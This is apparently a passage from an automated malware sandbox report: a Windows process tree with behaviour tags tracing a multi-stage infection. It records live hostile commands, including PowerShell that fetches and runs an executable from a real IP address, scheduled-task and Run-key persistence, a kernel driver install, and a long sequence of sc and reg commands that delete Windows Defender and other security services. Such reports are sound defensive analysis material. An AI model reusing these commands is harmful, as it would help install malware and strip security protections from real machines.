        C:\Windows\SysWOW64\WerFault.exe -u -p 10376 -s 968
        15⤵
        Program crash
        
        PID:18608
        
        C:\ProgramData\h4wb1dbiek.exe
        
        "C:\ProgramData\h4wb1dbiek.exe"
        10⤵
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe
        
        C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe 0
        11⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\I5SvKir3cjYvYxin.exe
        
        C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\I5SvKir3cjYvYxin.exe 3052
        12⤵
        
        PID:2528
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 880
        13⤵
        Program crash
        
        PID:18848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 920
        12⤵
        Program crash
        
        PID:18984
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\f379r" & exit
        10⤵
        
        PID:24464
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        11⤵
        Delays execution with timeout.exe
        
        PID:19684
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4708
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:908
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\is-GKS5B.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GKS5B.tmp\Bell_Setup16.tmp" /SL5="$1101F8,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\is-2433N.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2433N.tmp\Bell_Setup16.tmp" /SL5="$90060,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:4008
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        12⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3404
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:3248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        8⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\SysUpdate\bot.exe
        
        C:\Users\Admin\AppData\Local\Temp\SysUpdate\bot.exe
        9⤵
        
        PID:7660
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        10⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        11⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        12⤵
        
        PID:7596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        13⤵
        
        PID:1616
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        14⤵
        
        PID:7772
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        15⤵
        
        PID:7912
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        16⤵
        
        PID:6308
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        17⤵
        
        PID:7948
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        18⤵
        
        PID:8096
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        19⤵
        
        PID:1872
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        20⤵
        
        PID:6596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        21⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        22⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        23⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        24⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        25⤵
        
        PID:6832
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        26⤵
        
        PID:6876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        27⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        28⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        29⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        30⤵
        
        PID:5668
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        31⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        32⤵
        
        PID:5428
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        33⤵
        
        PID:1848
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        34⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        35⤵
        
        PID:7332
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        36⤵
        
        PID:7288
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        37⤵
        
        PID:7436
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        38⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        39⤵
        
        PID:7532
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        40⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        41⤵
        
        PID:3724
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        42⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        43⤵
        
        PID:7820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        44⤵
        
        PID:7940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        45⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        46⤵
        
        PID:8040
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        47⤵
        
        PID:6372
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        48⤵
        
        PID:5052
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime.exe"
        49⤵
        Modifies registry key
        
        PID:4912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe\"'"
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1816
        
        C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
        8⤵
        
        PID:212
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\10043810101\297cff0654.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043810101\297cff0654.exe"
        8⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043810101\297cff0654.exe"
        9⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\10043820101\53ec6f7213.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043820101\53ec6f7213.exe"
        8⤵
        
        PID:6916
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043820101\53ec6f7213.exe"
        9⤵
        
        PID:18712
      - C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:6020
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DBBA.tmp\DBBB.tmp\DBBC.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3104
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1224
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DCC3.tmp\DCC4.tmp\DCC5.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:5800
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:4552
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:2580
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:3556
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:3240
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4748
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1192
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5496
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1964
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2360
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:2912
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:3928
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:4776
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:4260
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:2112
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:6044
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:2040
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:3764
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:4896
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:4948
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3004
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:3568
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4912
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:848
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:5784
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5100
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:4732
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:1076
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:3400
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:844
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:4540
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:5680
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:2796
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:1012
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:2744
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:4908
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:5376
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:548
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:852
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:5060
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:1680
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:5888
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:5864
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:2840
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:1188
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:712
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3460
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:2592
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:5504
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:5024
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:1892
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:1372
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5468
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5772
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:5824
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:3520
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:5768
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:5664
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:3416
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2420
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:2948
      - C:\Users\Admin\AppData\Local\Temp\10367620101\accde9cdf4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367620101\accde9cdf4.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3108
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn yIiflmaurRH /tr "mshta C:\Users\Admin\AppData\Local\Temp\6ImH8ZvBV.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4008
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn yIiflmaurRH /tr "mshta C:\Users\Admin\AppData\Local\Temp\6ImH8ZvBV.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2160
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\6ImH8ZvBV.hta
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
        
        "C:\Users\Admin\AppData\Local\TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4888
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10367630121\am_no.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2112
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3764
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3624
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "I46PkmaDWJp" /tr "mshta \"C:\Temp\ESZPJoGnb.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3544
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\ESZPJoGnb.hta"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1532
      - C:\Users\Admin\AppData\Local\Temp\10367950101\202a17038f.exe
        
